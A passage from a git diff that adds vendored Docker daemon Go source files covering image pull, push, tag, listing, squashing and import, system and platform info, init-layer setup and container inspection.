daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + if err != nil { + return nil, false, err + } + + // retrieve repository + var ( + confirmedV2 bool + repository dist.Repository + lastError error + ) + + for _, endpoint := range endpoints { + if endpoint.Version == registry.APIVersion1 { + continue + } + + repository, confirmedV2, lastError = distribution.NewV2Repository(ctx, repoInfo, endpoint, nil, authConfig, "pull") + if lastError == nil && confirmedV2 { + break + } + } + return repository, confirmedV2, lastError +} diff --git 
a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/image_push.go new file mode 100644 index 0000000000..e6382c7f27 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_push.go @@ -0,0 +1,63 @@ +package daemon + +import ( + "io" + + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +// PushImage initiates a push operation on the repository named localName. +func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + if tag != "" { + // Push by digest is not supported, so only tags are supported. + ref, err = reference.WithTag(ref, tag) + if err != nil { + return err + } + } + + // Include a buffer so that slow client connections don't affect + // transfer performance. 
+ progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + ctx, cancelFunc := context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + imagePushConfig := &distribution.ImagePushConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeaders, + AuthConfig: authConfig, + ProgressOutput: progress.ChanOutput(progressChan), + RegistryService: daemon.RegistryService, + ImageEventLogger: daemon.LogImageEvent, + MetadataStore: daemon.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), + ReferenceStore: daemon.referenceStore, + }, + ConfigMediaType: schema2.MediaTypeImageConfig, + LayerStore: distribution.NewLayerProviderFromStore(daemon.layerStore), + TrustKey: daemon.trustKey, + UploadManager: daemon.uploadManager, + } + + err = distribution.Push(ctx, ref, imagePushConfig) + close(progressChan) + <-writesDone + return err +} diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go new file mode 100644 index 0000000000..36fa3b462e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/image_tag.go @@ -0,0 +1,37 @@ +package daemon + +import ( + "github.com/docker/docker/image" + "github.com/docker/docker/reference" +) + +// TagImage creates the tag specified by newTag, pointing to the image named +// imageName (alternatively, imageName can also be an image ID). 
+func (daemon *Daemon) TagImage(imageName, repository, tag string) error { + imageID, err := daemon.GetImageID(imageName) + if err != nil { + return err + } + + newTag, err := reference.WithName(repository) + if err != nil { + return err + } + if tag != "" { + if newTag, err = reference.WithTag(newTag, tag); err != nil { + return err + } + } + + return daemon.TagImageWithReference(imageID, newTag) +} + +// TagImageWithReference adds the given reference to the image ID provided. +func (daemon *Daemon) TagImageWithReference(imageID image.ID, newTag reference.Named) error { + if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { + return err + } + + daemon.LogImageEvent(imageID.String(), newTag.String(), "tag") + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/images.go b/vendor/github.com/docker/docker/daemon/images.go new file mode 100644 index 0000000000..88fb8f8e91 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images.go @@ -0,0 +1,331 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "sort" + "time" + + "github.com/pkg/errors" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" +) + +var acceptedImageFilterTags = map[string]bool{ + "dangling": true, + "label": true, + "before": true, + "since": true, + "reference": true, +} + +// byCreated is a temporary type used to sort a list of images by creation +// time. 
+type byCreated []*types.ImageSummary + +func (r byCreated) Len() int { return len(r) } +func (r byCreated) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byCreated) Less(i, j int) bool { return r[i].Created < r[j].Created } + +// Map returns a map of all images in the ImageStore +func (daemon *Daemon) Map() map[image.ID]*image.Image { + return daemon.imageStore.Map() +} + +// Images returns a filtered list of images. filterArgs is a JSON-encoded set +// of filter arguments which will be interpreted by api/types/filters. +// filter is a shell glob string applied to repository names. The argument +// named all controls whether all images in the graph are filtered, or just +// the heads. +func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { + var ( + allImages map[image.ID]*image.Image + err error + danglingOnly = false + ) + + if err := imageFilters.Validate(acceptedImageFilterTags); err != nil { + return nil, err + } + + if imageFilters.Include("dangling") { + if imageFilters.ExactMatch("dangling", "true") { + danglingOnly = true + } else if !imageFilters.ExactMatch("dangling", "false") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling")) + } + } + if danglingOnly { + allImages = daemon.imageStore.Heads() + } else { + allImages = daemon.imageStore.Map() + } + + var beforeFilter, sinceFilter *image.Image + err = imageFilters.WalkValues("before", func(value string) error { + beforeFilter, err = daemon.GetImage(value) + return err + }) + if err != nil { + return nil, err + } + + err = imageFilters.WalkValues("since", func(value string) error { + sinceFilter, err = daemon.GetImage(value) + return err + }) + if err != nil { + return nil, err + } + + images := []*types.ImageSummary{} + var imagesMap map[*image.Image]*types.ImageSummary + var layerRefs map[layer.ChainID]int + var allLayers map[layer.ChainID]layer.Layer + var allContainers []*container.Container + + 
for id, img := range allImages { + if beforeFilter != nil { + if img.Created.Equal(beforeFilter.Created) || img.Created.After(beforeFilter.Created) { + continue + } + } + + if sinceFilter != nil { + if img.Created.Equal(sinceFilter.Created) || img.Created.Before(sinceFilter.Created) { + continue + } + } + + if imageFilters.Include("label") { + // Very old image that do not have image.Config (or even labels) + if img.Config == nil { + continue + } + // We are now sure image.Config is not nil + if !imageFilters.MatchKVList("label", img.Config.Labels) { + continue + } + } + + layerID := img.RootFS.ChainID() + var size int64 + if layerID != "" { + l, err := daemon.layerStore.Get(layerID) + if err != nil { + return nil, err + } + + size, err = l.Size() + layer.ReleaseAndLog(daemon.layerStore, l) + if err != nil { + return nil, err + } + } + + newImage := newImage(img, size) + + for _, ref := range daemon.referenceStore.References(id.Digest()) { + if imageFilters.Include("reference") { + var found bool + var matchErr error + for _, pattern := range imageFilters.Get("reference") { + found, matchErr = reference.Match(pattern, ref) + if matchErr != nil { + return nil, matchErr + } + } + if !found { + continue + } + } + if _, ok := ref.(reference.Canonical); ok { + newImage.RepoDigests = append(newImage.RepoDigests, ref.String()) + } + if _, ok := ref.(reference.NamedTagged); ok { + newImage.RepoTags = append(newImage.RepoTags, ref.String()) + } + } + if newImage.RepoDigests == nil && newImage.RepoTags == nil { + if all || len(daemon.imageStore.Children(id)) == 0 { + + if imageFilters.Include("dangling") && !danglingOnly { + //dangling=false case, so dangling image is not needed + continue + } + if imageFilters.Include("reference") { // skip images with no references if filtering by reference + continue + } + newImage.RepoDigests = []string{"@"} + newImage.RepoTags = []string{":"} + } else { + continue + } + } else if danglingOnly && len(newImage.RepoTags) > 0 { + continue + 
} + + if withExtraAttrs { + // lazyly init variables + if imagesMap == nil { + allContainers = daemon.List() + allLayers = daemon.layerStore.Map() + imagesMap = make(map[*image.Image]*types.ImageSummary) + layerRefs = make(map[layer.ChainID]int) + } + + // Get container count + newImage.Containers = 0 + for _, c := range allContainers { + if c.ImageID == id { + newImage.Containers++ + } + } + + // count layer references + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + if _, ok := allLayers[chid]; !ok { + return nil, fmt.Errorf("layer %v was not found (corruption?)", chid) + } + } + imagesMap[img] = newImage + } + + images = append(images, newImage) + } + + if withExtraAttrs { + // Get Shared sizes + for img, newImage := range imagesMap { + rootFS := *img.RootFS + rootFS.DiffIDs = nil + + newImage.SharedSize = 0 + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + + diffSize, err := allLayers[chid].DiffSize() + if err != nil { + return nil, err + } + + if layerRefs[chid] > 1 { + newImage.SharedSize += diffSize + } + } + } + } + + sort.Sort(sort.Reverse(byCreated(images))) + + return images, nil +} + +// SquashImage creates a new image with the diff of the specified image and the specified parent. +// This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between. +// The existing image(s) is not destroyed. +// If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents. 
+func (daemon *Daemon) SquashImage(id, parent string) (string, error) { + img, err := daemon.imageStore.Get(image.ID(id)) + if err != nil { + return "", err + } + + var parentImg *image.Image + var parentChainID layer.ChainID + if len(parent) != 0 { + parentImg, err = daemon.imageStore.Get(image.ID(parent)) + if err != nil { + return "", errors.Wrap(err, "error getting specified parent layer") + } + parentChainID = parentImg.RootFS.ChainID() + } else { + rootFS := image.NewRootFS() + parentImg = &image.Image{RootFS: rootFS} + } + + l, err := daemon.layerStore.Get(img.RootFS.ChainID()) + if err != nil { + return "", errors.Wrap(err, "error getting image layer") + } + defer daemon.layerStore.Release(l) + + ts, err := l.TarStreamFrom(parentChainID) + if err != nil { + return "", errors.Wrapf(err, "error getting tar stream to parent") + } + defer ts.Close() + + newL, err := daemon.layerStore.Register(ts, parentChainID) + if err != nil { + return "", errors.Wrap(err, "error registering layer") + } + defer daemon.layerStore.Release(newL) + + var newImage image.Image + newImage = *img + newImage.RootFS = nil + + var rootFS image.RootFS + rootFS = *parentImg.RootFS + rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID()) + newImage.RootFS = &rootFS + + for i, hi := range newImage.History { + if i >= len(parentImg.History) { + hi.EmptyLayer = true + } + newImage.History[i] = hi + } + + now := time.Now() + var historyComment string + if len(parent) > 0 { + historyComment = fmt.Sprintf("merge %s to %s", id, parent) + } else { + historyComment = fmt.Sprintf("create new from %s", id) + } + + newImage.History = append(newImage.History, image.History{ + Created: now, + Comment: historyComment, + }) + newImage.Created = now + + b, err := json.Marshal(&newImage) + if err != nil { + return "", errors.Wrap(err, "error marshalling image config") + } + + newImgID, err := daemon.imageStore.Create(b) + if err != nil { + return "", errors.Wrap(err, "error creating new image after squash") 
+ } + return string(newImgID), nil +} + +func newImage(image *image.Image, virtualSize int64) *types.ImageSummary { + newImage := new(types.ImageSummary) + newImage.ParentID = image.Parent.String() + newImage.ID = image.ID().String() + newImage.Created = image.Created.Unix() + newImage.Size = virtualSize + newImage.VirtualSize = virtualSize + newImage.SharedSize = -1 + newImage.Containers = -1 + if image.Config != nil { + newImage.Labels = image.Config.Labels + } + return newImage +} diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/import.go new file mode 100644 index 0000000000..c93322b92e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/import.go @@ -0,0 +1,135 @@ +package daemon + +import ( + "encoding/json" + "errors" + "io" + "net/http" + "net/url" + "runtime" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/reference" +) + +// ImportImage imports an image, getting the archived layer data either from +// inConfig (if src is "-"), or from a URI specified in src. Progress output is +// written to outStream. Repository and tag names can optionally be given in +// the repo and tag arguments, respectively. 
+func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { + var ( + sf = streamformatter.NewJSONStreamFormatter() + rc io.ReadCloser + resp *http.Response + newRef reference.Named + ) + + if repository != "" { + var err error + newRef, err = reference.ParseNamed(repository) + if err != nil { + return err + } + + if _, isCanonical := newRef.(reference.Canonical); isCanonical { + return errors.New("cannot import digest reference") + } + + if tag != "" { + newRef, err = reference.WithTag(newRef, tag) + if err != nil { + return err + } + } + } + + config, err := dockerfile.BuildFromConfig(&container.Config{}, changes) + if err != nil { + return err + } + if src == "-" { + rc = inConfig + } else { + inConfig.Close() + u, err := url.Parse(src) + if err != nil { + return err + } + if u.Scheme == "" { + u.Scheme = "http" + u.Host = src + u.Path = "" + } + outStream.Write(sf.FormatStatus("", "Downloading from %s", u)) + resp, err = httputils.Download(u.String()) + if err != nil { + return err + } + progressOutput := sf.NewProgressOutput(outStream, true) + rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing") + } + + defer rc.Close() + if len(msg) == 0 { + msg = "Imported from " + src + } + + inflatedLayerData, err := archive.DecompressStream(rc) + if err != nil { + return err + } + // TODO: support windows baselayer? 
+ l, err := daemon.layerStore.Register(inflatedLayerData, "") + if err != nil { + return err + } + defer layer.ReleaseAndLog(daemon.layerStore, l) + + created := time.Now().UTC() + imgConfig, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: config, + Architecture: runtime.GOARCH, + OS: runtime.GOOS, + Created: created, + Comment: msg, + }, + RootFS: &image.RootFS{ + Type: "layers", + DiffIDs: []layer.DiffID{l.DiffID()}, + }, + History: []image.History{{ + Created: created, + Comment: msg, + }}, + }) + if err != nil { + return err + } + + id, err := daemon.imageStore.Create(imgConfig) + if err != nil { + return err + } + + // FIXME: connect with commit code and call refstore directly + if newRef != nil { + if err := daemon.TagImageWithReference(id, newRef); err != nil { + return err + } + } + + daemon.LogImageEvent(id.String(), id.String(), "import") + outStream.Write(sf.FormatStatus("", id.String())) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go new file mode 100644 index 0000000000..1ab9f29592 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info.go @@ -0,0 +1,180 @@ +package daemon + +import ( + "fmt" + "os" + "runtime" + "sync/atomic" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/parsers/operatingsystem" + "github.com/docker/docker/pkg/platform" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume/drivers" + "github.com/docker/go-connections/sockets" +) + +// SystemInfo returns information about the host server 
the daemon is running on. +func (daemon *Daemon) SystemInfo() (*types.Info, error) { + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + + operatingSystem := "" + if s, err := operatingsystem.GetOperatingSystem(); err != nil { + logrus.Warnf("Could not get operating system name: %v", err) + } else { + operatingSystem = s + } + + // Don't do containerized check on Windows + if runtime.GOOS != "windows" { + if inContainer, err := operatingsystem.IsContainerized(); err != nil { + logrus.Errorf("Could not determine if daemon is containerized: %v", err) + operatingSystem += " (error determining if containerized)" + } else if inContainer { + operatingSystem += " (containerized)" + } + } + + meminfo, err := system.ReadMemInfo() + if err != nil { + logrus.Errorf("Could not read system memory info: %v", err) + meminfo = &system.MemInfo{} + } + + sysInfo := sysinfo.New(true) + + var cRunning, cPaused, cStopped int32 + daemon.containers.ApplyAll(func(c *container.Container) { + switch c.StateString() { + case "paused": + atomic.AddInt32(&cPaused, 1) + case "running": + atomic.AddInt32(&cRunning, 1) + default: + atomic.AddInt32(&cStopped, 1) + } + }) + + securityOptions := []string{} + if sysInfo.AppArmor { + securityOptions = append(securityOptions, "name=apparmor") + } + if sysInfo.Seccomp && supportsSeccomp { + profile := daemon.seccompProfilePath + if profile == "" { + profile = "default" + } + securityOptions = append(securityOptions, fmt.Sprintf("name=seccomp,profile=%s", profile)) + } + if selinuxEnabled() { + securityOptions = append(securityOptions, "name=selinux") + } + uid, gid := daemon.GetRemappedUIDGID() + if uid != 0 || gid != 0 { + securityOptions = append(securityOptions, "name=userns") + } + + v := &types.Info{ + ID: daemon.ID, + Containers: int(cRunning + cPaused + cStopped), + ContainersRunning: int(cRunning), + ContainersPaused: 
int(cPaused), + ContainersStopped: int(cStopped), + Images: len(daemon.imageStore.Map()), + Driver: daemon.GraphDriverName(), + DriverStatus: daemon.layerStore.DriverStatus(), + Plugins: daemon.showPluginsInfo(), + IPv4Forwarding: !sysInfo.IPv4ForwardingDisabled, + BridgeNfIptables: !sysInfo.BridgeNFCallIPTablesDisabled, + BridgeNfIP6tables: !sysInfo.BridgeNFCallIP6TablesDisabled, + Debug: utils.IsDebugEnabled(), + NFd: fileutils.GetTotalUsedFds(), + NGoroutines: runtime.NumGoroutine(), + SystemTime: time.Now().Format(time.RFC3339Nano), + LoggingDriver: daemon.defaultLogConfig.Type, + CgroupDriver: daemon.getCgroupDriver(), + NEventsListener: daemon.EventsService.SubscribersCount(), + KernelVersion: kernelVersion, + OperatingSystem: operatingSystem, + IndexServerAddress: registry.IndexServer, + OSType: platform.OSType, + Architecture: platform.Architecture, + RegistryConfig: daemon.RegistryService.ServiceConfig(), + NCPU: sysinfo.NumCPU(), + MemTotal: meminfo.MemTotal, + DockerRootDir: daemon.configStore.Root, + Labels: daemon.configStore.Labels, + ExperimentalBuild: daemon.configStore.Experimental, + ServerVersion: dockerversion.Version, + ClusterStore: daemon.configStore.ClusterStore, + ClusterAdvertise: daemon.configStore.ClusterAdvertise, + HTTPProxy: sockets.GetProxyEnv("http_proxy"), + HTTPSProxy: sockets.GetProxyEnv("https_proxy"), + NoProxy: sockets.GetProxyEnv("no_proxy"), + LiveRestoreEnabled: daemon.configStore.LiveRestoreEnabled, + SecurityOptions: securityOptions, + Isolation: daemon.defaultIsolation, + } + + // Retrieve platform specific info + daemon.FillPlatformInfo(v, sysInfo) + + hostname := "" + if hn, err := os.Hostname(); err != nil { + logrus.Warnf("Could not get hostname: %v", err) + } else { + hostname = hn + } + v.Name = hostname + + return v, nil +} + +// SystemVersion returns version information about the daemon. 
+func (daemon *Daemon) SystemVersion() types.Version { + v := types.Version{ + Version: dockerversion.Version, + GitCommit: dockerversion.GitCommit, + MinAPIVersion: api.MinVersion, + GoVersion: runtime.Version(), + Os: runtime.GOOS, + Arch: runtime.GOARCH, + BuildTime: dockerversion.BuildTime, + Experimental: daemon.configStore.Experimental, + } + + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + v.KernelVersion = kernelVersion + + return v +} + +func (daemon *Daemon) showPluginsInfo() types.PluginsInfo { + var pluginsInfo types.PluginsInfo + + pluginsInfo.Volume = volumedrivers.GetDriverList() + pluginsInfo.Network = daemon.GetNetworkDriverList() + pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins + + return pluginsInfo +} diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go new file mode 100644 index 0000000000..9c41c0e4cd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_unix.go @@ -0,0 +1,82 @@ +// +build !windows + +package daemon + +import ( + "context" + "os/exec" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/sysinfo" +) + +// FillPlatformInfo fills the platform related info. 
+func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) { + v.MemoryLimit = sysInfo.MemoryLimit + v.SwapLimit = sysInfo.SwapLimit + v.KernelMemory = sysInfo.KernelMemory + v.OomKillDisable = sysInfo.OomKillDisable + v.CPUCfsPeriod = sysInfo.CPUCfsPeriod + v.CPUCfsQuota = sysInfo.CPUCfsQuota + v.CPUShares = sysInfo.CPUShares + v.CPUSet = sysInfo.Cpuset + v.Runtimes = daemon.configStore.GetAllRuntimes() + v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName() + v.InitBinary = daemon.configStore.GetInitPath() + + v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID + if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil { + v.ContainerdCommit.ID = sv.Revision + } else { + logrus.Warnf("failed to retrieve containerd version: %v", err) + v.ContainerdCommit.ID = "N/A" + } + + v.RuncCommit.Expected = dockerversion.RuncCommitID + if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil { + parts := strings.Split(strings.TrimSpace(string(rv)), "\n") + if len(parts) == 3 { + parts = strings.Split(parts[1], ": ") + if len(parts) == 2 { + v.RuncCommit.ID = strings.TrimSpace(parts[1]) + } + } + + if v.RuncCommit.ID == "" { + logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv)) + v.RuncCommit.ID = "N/A" + } + } else { + logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err) + v.RuncCommit.ID = "N/A" + } + + v.InitCommit.Expected = dockerversion.InitCommitID + if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil { + parts := strings.Split(strings.TrimSpace(string(rv)), " - ") + if len(parts) == 2 { + if dockerversion.InitCommitID[0] == 'v' { + vs := strings.TrimPrefix(parts[0], "tini version ") + v.InitCommit.ID = "v" + vs + } else { + // Get the sha1 + gitParts := strings.Split(parts[1], ".") + if len(gitParts) == 2 && gitParts[0] == "git" { + v.InitCommit.ID = gitParts[1] + 
v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])] + } + } + } + + if v.InitCommit.ID == "" { + logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv)) + v.InitCommit.ID = "N/A" + } + } else { + logrus.Warnf("failed to retrieve %s version", DefaultInitBinary) + v.InitCommit.ID = "N/A" + } +} diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go new file mode 100644 index 0000000000..c700911eb0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_windows.go @@ -0,0 +1,10 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/sysinfo" +) + +// FillPlatformInfo fills the platform related info. +func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) { +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go new file mode 100644 index 0000000000..66d53f0eef --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go @@ -0,0 +1,13 @@ +// +build solaris,cgo + +package initlayer + +// Setup populates a directory with mountpoints suitable +// for bind-mounting dockerinit into the container. The mountpoint is simply an +// empty file at /.dockerinit +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. 
+func Setup(initLayer string, rootUID, rootGID int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go new file mode 100644 index 0000000000..e83c2751ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go @@ -0,0 +1,69 @@ +// +build linux freebsd + +package initlayer + +import ( + "os" + "path/filepath" + "strings" + "syscall" + + "github.com/docker/docker/pkg/idtools" +) + +// Setup populates a directory with mountpoints suitable +// for bind-mounting things into the container. +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. +func Setup(initLayer string, rootUID, rootGID int) error { + for pth, typ := range map[string]string{ + "/dev/pts": "dir", + "/dev/shm": "dir", + "/proc": "dir", + "/sys": "dir", + "/.dockerenv": "file", + "/etc/resolv.conf": "file", + "/etc/hosts": "file", + "/etc/hostname": "file", + "/dev/console": "file", + "/etc/mtab": "/proc/mounts", + } { + parts := strings.Split(pth, "/") + prev := "/" + for _, p := range parts[1:] { + prev = filepath.Join(prev, p) + syscall.Unlink(filepath.Join(initLayer, prev)) + } + + if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil { + if os.IsNotExist(err) { + if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil { + return err + } + switch typ { + case "dir": + if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil { + return err + } + case "file": + f, err := os.OpenFile(filepath.Join(initLayer, pth), os.O_CREATE, 0755) + if err != nil { + return err + } + f.Chown(rootUID, rootGID) + f.Close() + default: + if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil { + return err + } + } + } else { + return err + } + } + } + + // Layer is 
ready to use, if it wasn't before. + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go new file mode 100644 index 0000000000..48a9d71aa5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go @@ -0,0 +1,13 @@ +// +build windows + +package initlayer + +// Setup populates a directory with mountpoints suitable +// for bind-mounting dockerinit into the container. The mountpoint is simply an +// empty file at /.dockerinit +// +// This extra layer is used by all containers as the top-most ro layer. It protects +// the container from unwanted side-effects on the rw layer. +func Setup(initLayer string, rootUID, rootGID int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go new file mode 100644 index 0000000000..557f639de1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect.go @@ -0,0 +1,264 @@ +package daemon + +import ( + "fmt" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" +) + +// ContainerInspect returns low-level information about a +// container. Returns an error if the container cannot be found, or if +// there is an error getting the data. 
+func (daemon *Daemon) ContainerInspect(name string, size bool, version string) (interface{}, error) { + switch { + case versions.LessThan(version, "1.20"): + return daemon.containerInspectPre120(name) + case versions.Equal(version, "1.20"): + return daemon.containerInspect120(name) + } + return daemon.ContainerInspectCurrent(name, size) +} + +// ContainerInspectCurrent returns low-level information about a +// container in a most recent api version. +func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, size) + if err != nil { + return nil, err + } + + apiNetworks := make(map[string]*networktypes.EndpointSettings) + for name, epConf := range container.NetworkSettings.Networks { + if epConf.EndpointSettings != nil { + apiNetworks[name] = epConf.EndpointSettings + } + } + + mountPoints := addMountPoints(container) + networkSettings := &types.NetworkSettings{ + NetworkSettingsBase: types.NetworkSettingsBase{ + Bridge: container.NetworkSettings.Bridge, + SandboxID: container.NetworkSettings.SandboxID, + HairpinMode: container.NetworkSettings.HairpinMode, + LinkLocalIPv6Address: container.NetworkSettings.LinkLocalIPv6Address, + LinkLocalIPv6PrefixLen: container.NetworkSettings.LinkLocalIPv6PrefixLen, + Ports: container.NetworkSettings.Ports, + SandboxKey: container.NetworkSettings.SandboxKey, + SecondaryIPAddresses: container.NetworkSettings.SecondaryIPAddresses, + SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses, + }, + DefaultNetworkSettings: daemon.getDefaultNetworkSettings(container.NetworkSettings.Networks), + Networks: apiNetworks, + } + + return &types.ContainerJSON{ + ContainerJSONBase: base, + Mounts: mountPoints, + Config: container.Config, + NetworkSettings: networkSettings, + }, nil +} + +// 
containerInspect120 serializes the master version of a container into a json type. +func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, false) + if err != nil { + return nil, err + } + + mountPoints := addMountPoints(container) + config := &v1p20.ContainerConfig{ + Config: container.Config, + MacAddress: container.Config.MacAddress, + NetworkDisabled: container.Config.NetworkDisabled, + ExposedPorts: container.Config.ExposedPorts, + VolumeDriver: container.HostConfig.VolumeDriver, + } + networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings) + + return &v1p20.ContainerJSON{ + ContainerJSONBase: base, + Mounts: mountPoints, + Config: config, + NetworkSettings: networkSettings, + }, nil +} + +func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) { + // make a copy to play with + hostConfig := *container.HostConfig + + children := daemon.children(container) + hostConfig.Links = nil // do not expose the internal structure + for linkAlias, child := range children { + hostConfig.Links = append(hostConfig.Links, fmt.Sprintf("%s:%s", child.Name, linkAlias)) + } + + // We merge the Ulimits from hostConfig with daemon default + daemon.mergeUlimits(&hostConfig) + + var containerHealth *types.Health + if container.State.Health != nil { + containerHealth = &types.Health{ + Status: container.State.Health.Status, + FailingStreak: container.State.Health.FailingStreak, + Log: append([]*types.HealthcheckResult{}, container.State.Health.Log...), + } + } + + containerState := &types.ContainerState{ + Status: container.State.StateString(), + Running: container.State.Running, + Paused: container.State.Paused, + Restarting: container.State.Restarting, + OOMKilled: 
